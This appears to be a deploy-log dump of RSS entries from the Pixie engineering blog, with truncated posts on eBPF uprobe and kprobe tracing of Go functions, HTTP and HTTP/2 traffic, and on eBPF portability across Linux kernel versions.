5:35:42 PM: ' <img class="gatsby-resp-image-image" alt="BPF for tracing (from Brendan Gregg)" title="BPF for tracing (from Brendan Gregg)" src="/static/a11d6d9cb78e055d59136a97665907d3/073a0/bpf-tracing.jpg" srcSet="/static/a11d6d9cb78e055d59136a97665907d3/8356d/bpf-tracing.jpg 259w,/static/a11d6d9cb78e055d59136a97665907d3/bc760/bpf-tracing.jpg 518w,/static/a11d6d9cb78e055d59136a97665907d3/073a0/bpf-tracing.jpg 610w" sizes="(max-width: 610px) 100vw, 610px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0" loading="lazy" decoding="async"/>\n' +

5:35:42 PM: ' </span>\n' +

5:35:42 PM: ' <figcaption class="gatsby-resp-image-figcaption">BPF for tracing (from Brendan Gregg)</figcaption>\n' +

5:35:42 PM: ' </figure></p></div><p>Let's see how uprobes actually function. To deploy uprobes and capture function arguments, we will be using <a href="https://github.com/pixie-io/pixie-demos/blob/main/simple-gotracing/app/app.go">this</a> simple demo application. The relevant parts of this Go program are shown below.</p><p><code>main()</code> is a simple HTTP server that exposes a single <em>GET</em> endpoint on <em>/e</em>, which computes Euler's number (<strong>e</strong>) using an iterative approximation. <code>computeE</code> takes in a single query param(<em>iters</em>), which specifies the number of iterations to run for the approximation. The more iterations, the more accurate the approximation, at the cost of compute cycles. It's not essential to understand the math behind the function. We are just interested in tracing the arguments of any invocation of <code>computeE</code>.</p><pre><code class="language-go:numbers">// computeE computes the approximation of e by running a fixed number of iterations.\n' +

5:35:42 PM: 'func computeE(iterations int64) float64 {\n' +

5:35:42 PM: ' res := 2.0\n' +

5:35:42 PM: ' fact := 1.0\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' for i := int64(2); i < iterations; i++ {\n' +

5:35:42 PM: ' fact *= float64(i)\n' +

5:35:42 PM: ' res += 1 / fact\n' +

5:35:42 PM: ' }\n' +

5:35:42 PM: ' return res\n' +

5:35:42 PM: '}\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'func main() {\n' +

5:35:42 PM: ' http.HandleFunc("/e", func(w http.ResponseWriter, r *http.Request) {\n' +

5:35:42 PM: ' // Parse iters argument from get request, use default if not available.\n' +

5:35:42 PM: ' // ... removed for brevity ...\n' +

5:35:42 PM: ' w.Write([]byte(fmt.Sprintf("e = %0.4f\\n", computeE(iters))))\n' +

5:35:42 PM: ' })\n' +

5:35:42 PM: ' // Start server...\n' +

5:35:42 PM: '}\n' +

5:35:42 PM: '</code></pre><p>To understand how uprobes work, let's look at how symbols are tracked inside binaries. Since uprobes work by inserting a debug trap instruction, we need to get the address where the function is located. Go binaries on Linux use ELF to store debug info. This information is available, even in optimized binaries, unless debug data has been stripped. We can use the command <code>objdump</code> to examine the symbols in the binary:</p><pre><code class="language-bash:numbers">[0] % objdump --syms app|grep computeE\n' +

5:35:42 PM: '00000000006609a0 g F .text 000000000000004b main.computeE\n' +

5:35:42 PM: '</code></pre><p>From the output, we know that the function <code>computeE</code> is located at address <code>0x6609a0</code>. To look at the instructions around it, we can ask <code>objdump</code> to disassemble to binary (done by adding <code>-d</code>). The disassembled code looks like:</p><pre><code class="language-bash:numbers">[0] % objdump -d app | less\n' +

5:35:42 PM: '00000000006609a0 <main.computeE>:\n' +

5:35:42 PM: ' 6609a0: 48 8b 44 24 08 mov 0x8(%rsp),%rax\n' +

5:35:42 PM: ' 6609a5: b9 02 00 00 00 mov $0x2,%ecx\n' +

5:35:42 PM: ' 6609aa: f2 0f 10 05 16 a6 0f movsd 0xfa616(%rip),%xmm0\n' +

5:35:42 PM: ' 6609b1: 00\n' +

5:35:42 PM: ' 6609b2: f2 0f 10 0d 36 a6 0f movsd 0xfa636(%rip),%xmm1\n' +

5:35:42 PM: '</code></pre><p>From this we can see what happens when <code>computeE</code> is called. The first instruction is <code>mov 0x8(%rsp),%rax</code>. This moves the content offset <code>0x8</code> from the <code>rsp</code> register to the <code>rax</code> register. This is actually the input argument <code>iterations</code> above; Go's arguments are passed on the stack.</p><p>With this information in mind, we are now ready to dive in and write code to trace the arguments for <code>computeE</code>.</p><h1>Building the Tracer</h1><p>To capture the events, we need to register a uprobe function and have a userspace function that can read the output. A diagram of this is shown below. We will write a binary called <code>tracer</code> that is responsible for registering the BPF code and reading the results of the BPF code. As shown, the uprobe will simply write to a perf-buffer, a linux kernel data structure used for perf events.</p><div class="image-m"><svg title="High-level overview showing the Tracer binary listening to perf events generated from the App" src="app-tracer.svg"></svg></div><p>Now that we understand the pieces involved, let's look into the details of what happens when we add an uprobe. The diagram below shows how the binary is modified by the Linux kernel with an uprobe. The soft-interrupt instruction (<code>int3</code>) is inserted as the first instruction in <code>main.computeE</code>. This causes a soft-interrupt, allowing the Linux kernel to '... 4564 more characters

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'Debugging with eBPF Part 2: Tracing full body HTTP request/responses',

5:35:42 PM: date: '2020-10-28',

5:35:42 PM: description: 'This is the second in a series of posts in which we share how you can use eBPF to debug applications without recompilation / redeployment…',

5:35:42 PM: url: 'https://blog.px.dev/ebpf-http-tracing/',

5:35:42 PM: guid: 'https://blog.px.dev/ebpf-http-tracing/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>This is the second in a series of posts in which we share how you can use eBPF to debug applications without recompilation / redeployment. The <a href="/ebpf-function-tracing/">first post</a> provided a short introduction to eBPF and demonstrated how to use it to write a simple function argument tracer. In this second post, we will look at how to use eBPF to capture HTTP 1.X traffic.</p><h1>Introduction</h1><p>Gaining visibility into HTTP traffic is valuable when working with distributed applications. This data can be used for performance, functional and security monitoring. Many applications accomplish this by utilizing middleware to add tracing or logging to HTTP requests in the application. One can also utilize popular open source frameworks like <a href="https://opentelemetry.io/">Open Telemetry</a> to instrument requests and related context. In this post, we will take a look at an alternative approach that utilizes eBPF to capture HTTP data without having to manually add instrumentation. One advantage of this approach is that it always works, even if applications have not been specifically instrumented.</p><p><a href="/ebpf-function-tracing/">Part 1</a> of this series provides a more detailed overview of eBPF, which allows you to run restricted C code upon some trigger event. Kprobes provide a mechanism to trace the Kernel API or internals and uprobes provide a mechanism to intercept specific instructions in a user program. Since applications typically sit on top of the Kernel system API, if we capture the Kernel interface we should be able to capture all the ingress and egress data and reconstruct the HTTP requests.</p><p>Alternatively, we can use uprobes to carefully instrument underlying HTTP libraries (eg. net/http in Go) to capture HTTP requests directly. Since uprobes work at the application level, their implementation will be dependent on the underlying language used.</p><p>This post will explore tracing HTTP requests using both kprobes and uprobes and compare the tradeoffs for each.</p><h2>What happens during an HTTP request?</h2><p>Before we start writing any BPF code, let’s try to understand how HTTP requests are handled by the system. We will utilize the same <a href="https://github.com/pixie-io/pixie-demos/blob/main/simple-gotracing/app/app.go">test application</a> we used in Part 1, a simple Golang HTTP server (simpleHTTP), however the results are generalizable to other HTTP applications.\n' +

5:35:42 PM: 'The first step is to understand what Linux kernel APIs are used to send and receive data for a simple HTTP request.</p><p>We can use the Linux <a href="https://perf.wiki.kernel.org/index.php/Main_Page">perf</a> command to understand what system calls are invoked:</p><pre><code class="language-bash">sudo perf trace -p <PID>\n' +

5:35:42 PM: '</code></pre><p>Using <code>curl</code>, we’ll make a simple HTTP request in another terminal window:</p><pre><code class="language-bash">curl http://localhost:9090/e\\?iters\\=10\n' +

5:35:42 PM: '</code></pre><p>Back in the original terminal window, where the <code>perf</code> command is running, you should see a spew of data:</p><pre><code class="language-bash">[0] % sudo perf trace -p 1011089\n' +

5:35:42 PM: ' ? ( ): app/1011089 ... [continued]: epoll_pwait()) = 1\n' +

5:35:42 PM: ' ...\n' +

5:35:42 PM: ' 0.087 ( 0.004 ms): app/1011089 accept4(fd: 3<socket:[7062148]>, upeer_sockaddr: 0xc0000799c8, upeer_addrlen: 0xc0000799ac, flags: 526336) = -1 EAGAIN (Resource temporarily unavailable)\n' +

5:35:42 PM: ' 0.196 ( 0.005 ms): app/1011089 read(fd: 4, buf: 0xc00010e000, count: 4096) = 88\n' +

5:35:42 PM: ' 0.238 ( 0.005 ms): app/1011089 futex(uaddr: 0xc000098148, op: WAKE|PRIVATE_FLAG, val: 1) = 1\n' +

5:35:42 PM: ' 0.278 ( 0.023 ms): app/1011089 write(fd: 4, buf: 0xc00010f000, count: 128) = 128\n' +

5:35:42 PM: ' ...\n' +

5:35:42 PM: ' 0.422 ( 0.002 ms): app/1011091 close(fd: 4) = 0\n' +

5:35:42 PM: ' ...\n' +

5:35:42 PM: '</code></pre><p>Note that we took care not to have any additional print statements in our <a href="https://github.com/pixie-io/pixie-demos/blob/main/simple-gotracing/app/app.go">app.go</a> simple Golang HTTP server to avoid creating extra system calls.</p><p>Examining the output of the <code>perf</code> call shows us that there are 3 relevant system calls: <code>accept4</code>, <code>write</code>, <code>close</code>. Tracing these system calls should allow us to capture all of the data the server is sending out in response to a request.</p><p>From the server’s perspective, a typical request flow is shown below, where each box represents a system call. The Linux system call API is typically much more complex than this and there are other variants that can be used. For the purposes of this post we assume this simplified version, which works well for the application that we are tracing.</p><div class="image-l"><svg title="System call flow for an HTTP request." src="http-request-flow-syscalls.png"></svg></div><p>While the focus of this example is on tracing the HTTP response, it is also possible to trace the data sent in the HTTP request by adding a probe to the <code>read</code> syscall.</p><h2>Tracing with Kprobes</h2><p>Now that we know that tracing <code>accept4</code>, <code>write</code> and <code>close</code> are sufficient for this binary, we can start constructing the BPF source code. Our program will roughly look like the following:</p><div class="image-m"><svg title="Diagram of our eBPF HTTP tracer using kprobes." src="kprobe-tracing.png"></svg></div><p>There is some additional complexity in the implementation in order to avoid limitations in eBPF (stacksize, etc.), but at a high level, we need to capture the following using 4 separate probes:</p><ul><li><strong>Entry to <code>accept4</code></strong>: The entry contains information about the socket. We store this socket information</li><li><strong>Return from <code>accept4</code></strong>: The return value for accept4 is the file descriptor. We store this file descriptor in a BPF_MAP.</li><li><strong>Entry to <code>write</code></strong>: The write function gives us information about the file descriptor and the data written to that file descriptor. We write out this data to a perf buffer so the userspace tracing program can read it.</li><li><strong>Entry to <code>close</code></strong>: We use the file descriptor information to clear the BPF_MAP we allocated above and stop tracking this fd.</li></ul><p>Note that kprobes work across the entire system so we need to filter by PID to limit capturing the data to only the processes of interest. This is done for all the probes listed above.</p><p>Once the data is captured, we can read it to our Go userspace program and parse the HTTP response using the <a href="https://golang.org/pkg/net/http/"><code>net/http</code></a> library.</p><p>The kprobe approach is conceptually simple, but the implementation is fairly long. You can check out the detailed code <a href="https://github.com/pixie-io/pixie-demos/blob/main/simple-gotracing/http_trace_kprobe/http_trace_kprobe.go">here</a>. For brevity, we left out a few details such as reading the return value from write to know how many bytes were actually written.</p><p>One downside to capturing data using kprobes is that we land up reparsing all responses since we intercept them after they have been converted to the write format. An alternative approach is to use uprobes to capture the data before it gets sent to the kernel where we can read the data before it has been serialized.</p><h2>Tracing with Uprobes</h2><p>Uprobes can be used to interrupt the execution of the program at a particular address and allow a BPF program to collect the underlying data. This capability can be used to capture data in a client library, but the underlying BPF code and addresses/offsets of interest will be dependent on the library's implementation . As a result, if there are changes in the client library, the uprobe will need to be updated as well. Therefore, it is best to add uprobes for client libraries that are unlikely to change significantly in order to minimize the number of updates we make to our uprobes.</p><p>For Go, we will try to find a tracepoint on the underlying <a href="https://golang.org/pkg/net/http/"><code>net/http</code></a> library. One approach is to directly examine the code to determine where to probe. We will show an alternate method that can be used to figure out which parts are relevant. For this, let’s run our application under <a href="https://github.com/go-delve/delve">delve</a>:</p><pre><code class="language-bash:numbers">[0] % dlv exec ./app\n' +

5:35:42 PM: 'Type 'help' for list of commands.\n' +

5:35:42 PM: '(dlv) c\n' +

5:35:42 PM: 'Starting server on: :9090\n' +

5:35:42 PM: '(dlv) break syscall.write\n' +

5:35:42 PM: 'Breakpoint 1 set at 0x497083 for syscall.write() /opt/golang/src/syscall/zsyscall_linux_amd64.go:998\n' +

5:35:42 PM: '</code></pre><p>As discussed earlier, the <code>write</code> syscall is utilized by the operating system in order to send a HTTP response. We therefore set a breakpoint there so that we can identify the underlying client code that triggers the syscall to 'write'. When we run the <code>curl</code> command again the program should interrupt. We get the backtrace using <code>bt</code>:</p><pre><code class="language-bash:numbers"> (dlv) bt\n' +

5:35:42 PM: ' 0x0000000000497083 in syscall.write at /opt/golang/src/syscall/zsyscall_linux_amd64.go:998\n' +

5:35:42 PM: ' 0x00000000004aa481 in syscall.Write at /opt/golang/src/syscall/syscall_unix.go:'... 7174 more characters

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'Observing HTTP/2 Traffic is Hard, but eBPF Can Help',

5:35:42 PM: date: '2022-01-19',

5:35:42 PM: description: "In today's world full of microservices, gaining observability into the messages sent between services is critical to understanding and…",

5:35:42 PM: url: 'https://blog.px.dev/ebpf-http2-tracing/',

5:35:42 PM: guid: 'https://blog.px.dev/ebpf-http2-tracing/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>In today's world full of microservices, gaining observability into the messages sent between services is critical to understanding and troubleshooting issues.</p><p>Unfortunately, tracing HTTP/2 is complicated by HPACK, HTTP/2’s dedicated header compression algorithm. While HPACK helps increase the efficiency of HTTP/2 over HTTP/1, its stateful algorithm sometimes renders typical network tracers ineffective. This means tools like Wireshark can't always decode the clear text HTTP/2 headers from the network traffic.</p><p>Fortunately, by using eBPF uprobes, it’s possible to trace the traffic <em>before</em> it gets compressed, so that you can actually debug your HTTP/2 (or gRPC) applications.</p><p>This post will answer the following questions</p><ul><li><a href="/ebpf-http2-tracing/#when-does-wireshark-fail-to-decode-http2-headers">When will Wireshark fail to decode HTTP/2 headers?</a></li><li><a href="/ebpf-http2-tracing/#hpack:-the-bane-of-the-wireshark">Why does HPACK complicate header decoding?</a></li><li><a href="/ebpf-http2-tracing/#uprobe-based-http2-tracing">How can eBPF uprobes solve the HPACK issue?</a></li></ul><p>as well as share a demo project showing how to trace HTTP/2 messages with eBPF uprobes.</p><h2>When does Wireshark fail to decode HTTP/2 headers?</h2><p><a href="https://www.wireshark.org/">Wireshark</a> is a well-known network sniffing tool that can capture HTTP/2. However, Wireshark sometimes fails to decode the HTTP/2 headers. Let’s see this in action.</p><p>If we launch Wireshark <em>before</em> we start our gRPC demo application, we see captured HTTP/2 messages in Wireshark:</p><div class="image-l"><svg title="Wireshark captured HTTP/2 HEADERS frame." src="wireshark-http2.png"></svg></div><p>Let’s focus on the <a href="https://datatracker.ietf.org/doc/html/rfc7540#section-6.2">HEADERS frame</a>, which is equivalent to the headers in HTTP 1.x, and records metadata about the HTTP/2 session. We can see that one particular HTTP/2 header block fragment has the raw bytes <code>bfbe</code>. In this case, the raw bytes encode the <code>grpc-status</code> and <code>grpc-message</code> headers. These are decoded correctly by Wireshark as follows:</p><div class="image-l"><svg title="Wireshark is able to decode HTTP/2 HEADERS if launched before the message stream starts." src="wireshark-http2-headers-captured.png"></svg></div><p>Next, let’s launch Wireshark <em>after</em> launching gRPC client & server. The same messages are captured, but the raw bytes can no longer be decoded by Wireshark:</p><div class="image-l"><svg title="Wireshark cannot decode HTTP/2 HEADERS if launched after the message stream starts." src="wireshark-http2-headers-not-captured.png"></svg></div><p>Here, we can see that the <code>Header Block Fragment</code> still shows the same raw bytes, but the clear-text headers cannot be decoded.</p><p>To replicate the experiment for yourself, follow the directions <a href="https://github.com/pixie-io/pixie-demos/tree/main/http2-tracing#trace-http2-headers-with-wireshark">here</a>.</p><h2>HPACK: the bane of the Wireshark</h2><p>Why can’t Wireshark decode HTTP/2 headers if it is launched after our gRPC application starts transmitting messages?</p><p>It turns out that HTTP/2 uses <a href="https://httpwg.org/specs/rfc7541.html">HPACK</a> to encode & decoder headers, which compresses the headers and <a href="https://blog.cloudflare.com/hpack-the-silent-killer-feature-of-http-2/">greatly improves the efficiency over HTTP 1.x</a>.</p><p>HPACK works by maintaining identical lookup tables at the server and client. Headers and/or their values are replaced with their indices in these lookup tables. Because most of the headers are repetitively transmitted, they are replaced by indices that use much less bytes than clear-text headers. HPACK therefore uses significantly less network bandwidth. This effect is amplified by the fact that multiple HTTP/2 sessions can multiplex over the same connection.</p><p>The figure below illustrates the table maintained by the client and server for response headers. New header name and value pairs are appended into the table, displacing the old entries if the size of the lookup tables reaches its limit. When encoding, the clear text headers are replaced by their indices in the table. For more info, take a look at <a href="https://httpwg.org/specs/rfc7541.html">the official RFC</a>.</p><div class="image-xl"><svg title="HTTP/2’s HPACK compression algorithm requires that the client and server maintain identical lookup tables to decode the headers. This makes decoding HTTP/2 headers difficult for tracers that don’t have access to this state." src="hpack-diagram.png"></svg></div><p>With this knowledge, the results of the Wireshark experiment above can be explained clearly. When Wireshark is launched <em>before</em> starting the application, the entire history of the headers are recorded, such that Wireshark can reproduce the exact same header tables.</p><p>When Wireshark is launched <em>after</em> starting the application, the initial HTTP/2 frames are lost, such that the later encoded bytes <code>bebf</code> have no corresponding entries in the lookup tables. Wireshark therefore cannot decode the corresponding headers.</p><p>HTTP/2 headers are metadata of the HTTP/2 connection. These headers are critical information for debugging microservices. For example, <code>:path</code> contains the resource being requested; <code>content-type</code> is required to detect gRPC messages, and then apply protobuf parsing; and <code>grpc-status</code> is required to determine the success of a gRPC call. Without this information, HTTP/2 tracing loses the majority of its value.</p><h2>Uprobe-based HTTP/2 tracing</h2><p>So if we can’t properly decode HTTP/2 traffic without knowing the state, what can we do?</p><p>Fortunately, eBPF technology makes it possible for us to probe into HTTP/2 implementation to get the information that we need, without requiring state.</p><p>Specifically, eBPF uprobes address the HPACK issue by directly tracing clear-text data from application memory. By attaching uprobes to the HTTP/2 library APIs that take clear-text headers as input, the uprobes are able to directly read the header content from application memory before they are compressed with HPACK.</p><p><a href="https://blog.px.dev/ebpf-http-tracing/#tracing-with-uprobes">An earlier blog post on eBPF</a> shows how to implement an uprobe tracer for HTTP applications written in Golang. The first step is to identify the function to attach BPF probes. The function’s arguments need to contain the information we are interested in. The arguments ideally should also have simple structure, such that accessing them in BPF code is easy (through manual pointer chasing). And the function needs to be stable, such that the probes work for a wide range of versions.</p><p>Through investigation of the source code of Golang’s gRPC library, we identified <code>loopyWriter.writeHeader()</code> as an ideal tracepoint. This function accepts clear text header fields and sends them into the internal buffer. The function signature and the arguments’ type definition is stable, and has not been changed since <a href="https://github.com/grpc/grpc-go/commits/master/internal/transport/controlbuf.go">2018</a>.</p><p>Now the challenge is to figure out the memory layout of the data structure, and write the BPF code to read the data at the correct memory addresses.</p><p>Let’s take a look at the the signature of the function:</p><pre><code class="language-golang">func (l *loopyWriter) writeHeader(streamID uint32, endStream bool, hf []hpack.HeaderField, onWrite func())\n' +
'</code></pre><p>The task is to read the content of the 3rd argument <code>hf</code>, which is a slice of <code>HeaderField</code>. We use the <code>dlv</code> debugger to figure out the offset of nested data elements, and the results are shown in <a href="https://github.com/pixie-io/pixie-demos/blob/main/http2-tracing/uprobe_trace/bpf_program.go"><code>http2-tracing/uprobe_trace/bpf_program.go</code></a>.</p><p>This code performs 3 tasks:</p><ul><li><p><a href="https://github.com/pixie-io/pixie-demos/blob/main/http2-tracing/uprobe_trace/bpf_program.go#L79">probe_loopy_writer_write_header()</a> obtains a pointer to the HeaderField objects held in the slice. A slice resides in memory as a 3-tuple of {pointer, size, capacity}, where the BPF code reads the pointer and size of certain offsets from the SP pointer.</p></li><li><p><a href="https://github.com/pixie-io/pixie-demos/blob/main/http2-tracing/uprobe_trace/bpf_program.go#L63">submit_headers()</a> navigates the list of HeaderField objects through the pointer, by incrementing the pointer with the size of the HeaderField object.</p></li><li><p>For each HeaderField object, <a href="https://github.com/pixie-io/pixie-demos/blob/main/http2-tracing/uprobe_trace/bpf_program.go#L51">copy_header_field()</a> copies its content to the output perf buffer. HeaderField is a struct of 2 string objects. Moreover, each string object resides in memory as a 2-tuple of {pointer, size}, where the BPF code copies the corresponding number of bytes from the pointer.</p></li></ul><p>Let’s run the uprobe HTTP/2 tracer, then start up the gRPC client and server. Note that this tracer works even if the tracer was launched after the connection between the gRPC client and server are es'... 4349 more characters

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'The Challenge with Deploying eBPF Into the Wild',

5:35:42 PM: date: '2022-02-16',

5:35:42 PM: description: 'eBPF technology has been a game-changer for applications that want to interact with the Linux kernel in a safe way. The use of eBPF probes…',

5:35:42 PM: url: 'https://blog.px.dev/ebpf-portability/',

5:35:42 PM: guid: 'https://blog.px.dev/ebpf-portability/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p><a href="http://ebpf.io">eBPF</a> technology has been a game-changer for applications that want to interact with the Linux kernel in a safe way. The use of eBPF probes has led to efficiency improvements and new capabilities in fields like observability, networking, and security.</p><p>One problem that hinders the wide-scale deployment of eBPF is the fact that it is challenging to build applications that are compatible across a wide range of Linux distributions.</p><p>If you’re fortunate enough to work in a uniform environment, this may not be such a big deal. But if you’re writing eBPF programs for general distribution, then you don’t get to control the environment. Your users will have a variety of Linux distributions, with different kernel versions, kernel configurations, and distribution-specific quirks.</p><p>Faced with such a problem, what can you do to make sure that your eBPF-based application will work on as many environments as possible?</p><p>In this blog post, we examine this question, and share some of our learnings from deploying Pixie across a wide range of environments.</p><h2>What's the Problem?</h2><p><em>Note: The problem of BPF portability is covered in detail by Andrii Nakryiko in his <a href="https://nakryiko.com/posts/bpf-portability-and-co-re/">blog post</a> on the subject. In this section, we rehash the problem briefly.</em></p><p>To understand why it can be problematic to deploy eBPF programs across different target environments, it’s important to first review the eBPF build pipeline. We’ll start with the basic flow used by frameworks like BCC. There are newer approaches with libbpf + CO-RE, but we’ll cover that later.</p><div class="image-xl"><svg title="The BCC eBPF deployment flow: The eBPF code is compiled on the target host to make sure that the program is compatible." src="bcc-ebpf-diagram.png"></svg></div><p>In the basic flow, the eBPF code is compiled into BPF byte code, and then deployed into the kernel. Assuming that the BPF verifier doesn’t reject the code, the eBPF program is then run by the kernel whenever triggered by the appropriate event.</p><p>In this flow, it’s important to note that this entire process needs to happen on the host machine. One can’t simply compile to BPF bytecode on their local machine and then ship the bytecode to different host machines.</p><p>Why? Because each host may have a different kernel, and so kernel struct layouts may have changed.</p><p>Let’s make this more concrete with a couple of examples. First, let’s look at a very simple eBPF program that doesn’t have any portability issues:</p><pre><code class="language-cpp">// Map that stores counts of times triggered, by PID.\n' +

5:35:42 PM: 'BPF_HASH(counts_by_pid, uint32_t, int64_t);\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '// Probe that counts every time it is triggered.\n' +

5:35:42 PM: '// Can be used to count things like syscalls or particular functions.\n' +

5:35:42 PM: 'int syscall__probe_counter(struct pt_regs* ctx) {\n' +

5:35:42 PM: ' uint32_t tgid = bpf_get_current_pid_tgid() >> 32;\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' int64_t kInitVal = 0;\n' +

5:35:42 PM: ' int64_t* count = counts_by_pid.lookup_or_init(&tgid, &kInitVal);\n' +

5:35:42 PM: ' if (count != NULL) {\n' +

5:35:42 PM: ' *count = *count + 1;\n' +

5:35:42 PM: ' }\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' return 0;\n' +

5:35:42 PM: '}\n' +

5:35:42 PM: '</code></pre><p>The code above can be attached on a syscall (for example, the <code>recv()</code> syscall). Then, every time the syscall is made, the probe is triggered and the count for that PID is incremented. The counts are stored in a BPF map, which means the current counts for each PID can be read from user-space at any time to get the latest value.</p><p>This code is actually pretty robust to different kernel versions because it doesn’t rely on any kernel-specific structs. So if you manage to compile it with the wrong Linux headers, it will still work.</p><p>But now let’s tweak our example. Say we realize that process IDs (called TGIDs in the kernel) can be reused, and we don’t want to alias the counts. One thing we can do is to use the <code>start_time</code> of the process to differentiate recycled PIDs. So we might write the following code:</p><pre><code class="language-cpp">#include <linux/sched.h>\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'struct tgid_ts_t {\n' +

5:35:42 PM: ' uint32_t tgid;\n' +

5:35:42 PM: ' uint64_t ts; // Timestamp when the process started.\n' +

5:35:42 PM: '};\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '// Effectively returns task->group_leader->real_start_time;\n' +

5:35:42 PM: '// Note that before Linux 5.5, real_start_time was called start_boottime.\n' +

5:35:42 PM: 'static inline __attribute__((__always_inline__)) uint64_t get_tgid_start_time() {\n' +

5:35:42 PM: ' struct task_struct* task = (struct task_struct*)bpf_get_current_task();\n' +

5:35:42 PM: ' struct task_struct* group_leader_ptr = task->group_leader;\n' +

5:35:42 PM: ' uint64_t start_time = group_leader_ptr->start_time;\n' +

5:35:42 PM: ' return div_u64(start_time, NSEC_PER_SEC / USER_HZ);\n' +

5:35:42 PM: '}\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '// Map that stores counts of times triggered, by PID.\n' +

5:35:42 PM: 'BPF_HASH(counts_by_pid, struct tgid_ts_t, int64_t);\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '// Probe that counts every time it is triggered.\n' +

5:35:42 PM: '// Can be used to count things like syscalls or particular functions.\n' +

5:35:42 PM: 'int syscall__probe_counter(struct pt_regs* ctx) {\n' +

5:35:42 PM: ' uint32_t tgid = bpf_get_current_pid_tgid() >> 32;\n' +

5:35:42 PM: ' struct tgid_ts_t process_id = {};\n' +

5:35:42 PM: ' process_id.tgid = tgid;\n' +

5:35:42 PM: ' process_id.ts = get_tgid_start_time();\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' int64_t kInitVal = 0;\n' +

5:35:42 PM: ' int64_t* count = counts_by_pid.lookup_or_init(&process_id, &kInitVal);\n' +

5:35:42 PM: ' if (count != NULL) {\n' +

5:35:42 PM: ' *count = *count + 1;\n' +

5:35:42 PM: ' }\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' return 0;\n' +

5:35:42 PM: '}\n' +

5:35:42 PM: '</code></pre><p>This code is similar to the original, but the counts map is now indexed by the PID plus the timestamp of when the process was started. To get the start time of a PID, however, we needed to read the internal kernel struct called the <code>task_struct</code>.</p><p>When the program above is compiled, it uses <code>linux/sched.h</code> to know where in the <code>task_struct</code> the <code>group_leader</code> and <code>real_start_time</code> fields are located. These offsets are hard-coded into the bytecode.</p><p>You can likely imagine why this would be brittle now. What if you compiled this with Linux 5.5 headers, but were able to deploy it on a host with Linux 5.8? Imagine what would happen if a new member was added to the <code>struct task_struct</code>:</p><pre><code class="language-cpp">struct task_struct {\n' +

5:35:42 PM: ' ...\n' +

5:35:42 PM: ' struct task_struct *group_leader;\n' +

5:35:42 PM: ' ...\n' +

5:35:42 PM: ' int cool_new_member;\n' +

5:35:42 PM: ' ...\n' +

5:35:42 PM: ' uint64_t real_start_time;\n' +

5:35:42 PM: ' ...\n' +

5:35:42 PM: '}\n' +

5:35:42 PM: '</code></pre><p>If a new member is added to the struct, then the location of <code>real_start_time</code> in memory would change, and the compiled bytecode would look for <code>real_start_time</code> in the wrong location. If you somehow managed to deploy the compiled program on a machine with a different kernel version, you’d get wildly wrong results, because the eBPF program would read the wrong location in memory.</p><p>The picture gets one level more complicated with kernel configs. You may even think you have a perfect match in terms of Kernel versions, but if one kernel was built with a particular <code>#define</code>, it could also move the location of members, and you’d get unexpected results again.</p><p>In short, to make sure that your eBPF program produces the right results, it must be run on a machine with the same kernel as the machine it was compiled on.</p><h2>The BCC Solution</h2><p>The BCC solution to handling different struct layouts across kernel versions is to perform the compilation on the host, as shown in the initial figure. If you compile your BPF code on the target machine, then you’ll use the right headers, and life will be good.</p><p>There are two gotchas with this approach:</p><ol><li><p>You must deploy a copy of the compiler (clang) with your eBPF code so that compilation can be performed on the target machine. This has both a space and time cost.</p></li><li><p>You are relying on the target machine having the Linux headers installed. If the Linux headers are missing, you won’t be able to compile your eBPF code.</p></li></ol><p>We’re going to ignore problem #1 for the moment, since–though not efficient–the cost is only incurred when initially deploying eBPF programs. Problem #2, however, could prevent your application from deploying, and your users will be frustrated.</p><h2>Getting Linux Headers</h2><p>The BCC solution all comes down to having the Linux headers on the host. This way, you can compile and run your eBPF code on the same machine, avoiding any data structure mis-matches. This also means your target machines better have the Linux headers available.</p><p>The best case scenario is 